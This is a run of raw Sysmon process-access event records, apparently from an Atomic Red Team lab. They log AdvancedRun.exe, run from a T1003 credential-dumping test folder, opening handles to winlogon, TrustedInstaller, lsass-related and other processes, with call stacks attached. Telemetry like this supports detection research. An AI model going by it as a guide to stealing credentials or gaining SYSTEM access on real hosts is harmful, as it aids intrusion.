AUTHORITY\SYSTEMATTACKRANGE\Administrator 10341000x80000000000000003952188Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.323{834264DD-ED47-61EA-7903-000000002702}1108680C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-ED47-61EA-7A03-000000002702}5868C:\Windows\servicing\TrustedInstaller.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21f3|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21bd|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003952187Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:28:39.323{834264DD-ED47-61EA-7903-000000002702}1108680C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-ED47-61EA-7A03-000000002702}5868C:\Windows\servicing\TrustedInstaller.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003952186Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:28:39.323{834264DD-ED47-61EA-7903-000000002702}1108680C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-ED47-61EA-7803-000000002702}4916C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003952185Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:28:39.323{834264DD-DAE4-61EA-0C00-000000002702}652332C:\Windows\system32\lsass.exe{834264DD-ED47-61EA-7803-000000002702}4916C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMATTACKRANGE\Administrator 10341000x80000000000000003952184Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:28:39.323{834264DD-ED47-61EA-7903-000000002702}1108680C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-E497-61EA-F401-000000002702}2136C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003952183Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:28:39.323{834264DD-ED47-61EA-7903-000000002702}1108680C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-E497-61EA-F301-000000002702}944C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003952182Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:28:39.323{834264DD-ED47-61EA-7803-000000002702}4916412C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0900-000000002702}576C:\Windows\system32\winlogon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21f3|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21bd|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003952181Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:28:39.323{834264DD-ED47-61EA-7803-000000002702}4916412C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-ED47-61EA-7A03-000000002702}5868C:\Windows\servicing\TrustedInstaller.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003952180Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.323{834264DD-ED47-61EA-7903-000000002702}1108680C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-E491-61EA-F201-000000002702}3896C:\Program 
Files\Notepad++\notepad++.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003952179Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:28:39.323{834264DD-ED47-61EA-7903-000000002702}1108680C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB6F-61EA-B100-000000002702}2348C:\Windows\System32\msdtc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000003952178Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:28:39.323{834264DD-ED47-61EA-7803-000000002702}4916412C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-ED47-61EA-7903-000000002702}1108C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003952177Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:28:39.323{834264DD-ED47-61EA-7803-000000002702}4916412C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-E497-61EA-F401-000000002702}2136C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003952176Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:28:39.323{834264DD-ED47-61EA-7903-000000002702}1108680C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB13-61EA-9A00-000000002702}5612C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003952175Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:28:39.323{834264DD-ED47-61EA-7803-000000002702}4916412C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-E497-61EA-F301-000000002702}944C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003952174Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:28:39.323{834264DD-ED47-61EA-7903-000000002702}1108680C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB12-61EA-9900-000000002702}5508C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003952173Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.323{834264DD-ED47-61EA-7803-000000002702}4916412C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-E491-61EA-F201-000000002702}3896C:\Program 
Files\Notepad++\notepad++.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003952172Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:28:39.323{834264DD-ED47-61EA-7903-000000002702}1108680C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB12-61EA-9700-000000002702}5364C:\Windows\Sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003952170Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
